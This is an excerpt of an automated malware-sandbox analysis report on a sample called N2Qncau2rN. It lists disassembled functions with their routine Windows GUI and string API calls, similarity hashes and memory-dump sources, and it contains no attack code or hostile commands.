                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 960795272-0
                                                                                                                                                                                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                                                                                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4189319755-0
                                                                                                                                                                                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                                                                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1976402638-0
                                                                                                                                                                                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                                                                                                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                                                                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                • API String ID: 2487901850-572801152
                                                                                                                                                                                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                                                                Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1871949834-0
                                                                                                                                                                                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                                                                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                                                                Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3611059338-0
                                                                                                                                                                                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                                                                                Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1640429340-0
                                                                                                                                                                                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                                                                                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3632110297-0
                                                                                                                                                                                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                                                                                Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 752480666-0
                                                                                                                                                                                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                                                                                                Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                                                                                                Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
